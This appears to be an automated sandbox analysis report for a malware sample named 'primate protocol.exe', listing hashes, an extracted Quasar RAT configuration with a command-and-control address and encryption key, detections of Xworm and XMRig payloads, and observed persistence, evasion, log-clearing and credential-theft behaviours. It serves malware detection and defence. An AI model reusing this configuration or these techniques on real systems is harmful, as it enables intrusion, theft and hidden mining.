Analysis
-
max time kernel
133s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
03/05/2025, 16:15
Static task
static1
Behavioral task
behavioral1
Sample
primate protocol.exe
Resource
win10v2004-20250502-en
Behavioral task
behavioral2
Sample
primate protocol.exe
Resource
win11-20250502-en
General
-
Target
primate protocol.exe
-
Size
4.7MB
-
MD5
28fccc4c460bbe5df088d182c156531c
-
SHA1
0e4ff4e76b430ae326ff14d4e0e304b38497a9ab
-
SHA256
fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
-
SHA512
49f8d5feb07aff5efc0d592cd7886e7da3a7a6069f64b8332d0696c2860b5376c34d8825fa6f3c8a6f5590de803b1e840cc41605d24199c9890e0d23d2f4fca8
-
SSDEEP
49152:SmQvdtV2bnS7TKxxXf4cFefFbAbsW4H94VPxfAcGDtpZ4Bl6nQWPvkO8oiTa8qd+:SZtV2SsfHeW4HmVPG7RYBlUPvbAEba
Malware Config
Extracted
quasar
1.6.0
client
174.61.118.194:4872
eab25b68-ae09-4c5c-b42f-516771913f6f
-
encryption_key
4ECD6F0D7A0CD0888AC4DF40F22ECF5C3E76855B
-
install_name
sysprochost.exe
-
key_salt
5a23f8394640cb9e40658446a04c0bbae82dc93d0470e1b2a406a90fd2520382
-
log_directory
ok
-
reconnect_delay
3000
-
startup_key
HOST
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x00070000000241e0-25.dat family_xworm behavioral1/memory/1060-33-0x00000000006C0000-0x000000000072A000-memory.dmp family_xworm behavioral1/memory/3096-1470-0x0000000000F40000-0x0000000000FAA000-memory.dmp family_xworm behavioral1/memory/5876-2431-0x0000000000220000-0x000000000028A000-memory.dmp family_xworm -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000241dc-4.dat family_quasar behavioral1/memory/3880-21-0x000001A4E37B0000-0x000001A4E3942000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4480 created 616 4480 powershell.EXE 5 PID 5052 created 616 5052 powershell.EXE 5 -
Xmrig family
-
Xworm family
-
XMRig Miner payload 5 IoCs
resource yara_rule behavioral1/memory/4832-158-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4832-159-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4832-157-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4832-156-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral1/memory/4832-160-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
pid Process 4480 powershell.EXE 5052 powershell.EXE 2592 powershell.exe -
Creates new service(s) 2 TTPs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation primate protocol.exe Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation CompPkg.exe Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation systemprocess.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe CompPkg.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe CompPkg.exe -
Executes dropped EXE 7 IoCs
pid Process 3880 systemprocess.exe 5948 host.exe 1060 CompPkg.exe 4904 CompPkg.exe 1632 ijujdfuujtjk.exe 3096 CompPkg.exe 5876 CompPkg.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" CompPkg.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img" CompPkg.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 5948 set thread context of 704 5948 host.exe 118 PID 1632 set thread context of 4492 1632 ijujdfuujtjk.exe 140 PID 1632 set thread context of 6036 1632 ijujdfuujtjk.exe 141 PID 1632 set thread context of 4832 1632 ijujdfuujtjk.exe 142 PID 4480 set thread context of 3148 4480 powershell.EXE 145 PID 5052 set thread context of 4500 5052 powershell.EXE 146 -
resource yara_rule behavioral1/memory/4832-152-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4832-154-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4832-153-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4832-158-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4832-159-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4832-157-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4832-156-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral1/memory/4832-160-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\systemprocess.exe primate protocol.exe File created C:\Windows\host.exe primate protocol.exe File created C:\Windows\CompPkg.exe primate protocol.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1100 sc.exe 1292 sc.exe 1800 sc.exe 3532 sc.exe 1920 sc.exe 2760 sc.exe 1760 sc.exe 4340 sc.exe 2008 sc.exe 4092 sc.exe 1240 sc.exe 1524 sc.exe 4056 sc.exe 2580 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language primate protocol.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4036 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 832 timeout.exe 3552 timeout.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133907626609832177" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{C39E5D0C-9F5A-4087-ACFB-9AFB8511C36F} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1153236273-2212388449-1493869963-1000\{1B8FE61C-B4DB-4F04-8069-E6E2E8EE2AD7} msedge.exe Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4756 schtasks.exe 4760 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3880 systemprocess.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4440 powershell.exe 2336 powershell.exe 2336 powershell.exe 4440 powershell.exe 3880 systemprocess.exe 2592 powershell.exe 2592 powershell.exe 5948 host.exe 5948 host.exe 5948 host.exe 5948 host.exe 5948 host.exe 5948 host.exe 5948 host.exe 5948 host.exe 5948 host.exe 5948 host.exe 1632 ijujdfuujtjk.exe 1632 ijujdfuujtjk.exe 4480 powershell.EXE 4480 powershell.EXE 1632 ijujdfuujtjk.exe 1632 ijujdfuujtjk.exe 1632 ijujdfuujtjk.exe 1632 ijujdfuujtjk.exe 1632 ijujdfuujtjk.exe 1632 ijujdfuujtjk.exe 4480 powershell.EXE 5052 powershell.EXE 5052 powershell.EXE 5052 powershell.EXE 4480 powershell.EXE 3148 dllhost.exe 3148 dllhost.exe 3148 dllhost.exe 3148 dllhost.exe 5052 powershell.EXE 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 3880 systemprocess.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe 4500 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3556 Explorer.EXE 4064 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 2016 chrome.exe 6000 msedge.exe 6000 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3880 systemprocess.exe Token: SeDebugPrivilege 1060 CompPkg.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 4904 CompPkg.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 5948 host.exe Token: SeDebugPrivilege 4480 powershell.EXE Token: SeDebugPrivilege 1632 ijujdfuujtjk.exe Token: SeDebugPrivilege 5052 powershell.EXE Token: SeDebugPrivilege 4480 powershell.EXE Token: SeDebugPrivilege 3148 dllhost.exe Token: SeDebugPrivilege 5052 powershell.EXE Token: SeDebugPrivilege 4500 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe Token: SeSystemEnvironmentPrivilege 2256 svchost.exe Token: SeUndockPrivilege 2256 svchost.exe Token: SeManageVolumePrivilege 2256 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe Token: SeSystemEnvironmentPrivilege 2256 svchost.exe Token: SeUndockPrivilege 2256 svchost.exe Token: SeManageVolumePrivilege 2256 svchost.exe Token: SeDebugPrivilege 4600 wmiprvse.exe Token: SeAuditPrivilege 2168 svchost.exe Token: SeAuditPrivilege 2652 svchost.exe Token: SeAuditPrivilege 2652 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2256 svchost.exe Token: SeIncreaseQuotaPrivilege 2256 svchost.exe Token: SeSecurityPrivilege 2256 svchost.exe Token: SeTakeOwnershipPrivilege 2256 svchost.exe Token: SeLoadDriverPrivilege 2256 svchost.exe Token: SeSystemtimePrivilege 2256 svchost.exe Token: SeBackupPrivilege 2256 svchost.exe Token: SeRestorePrivilege 2256 svchost.exe Token: SeShutdownPrivilege 2256 svchost.exe 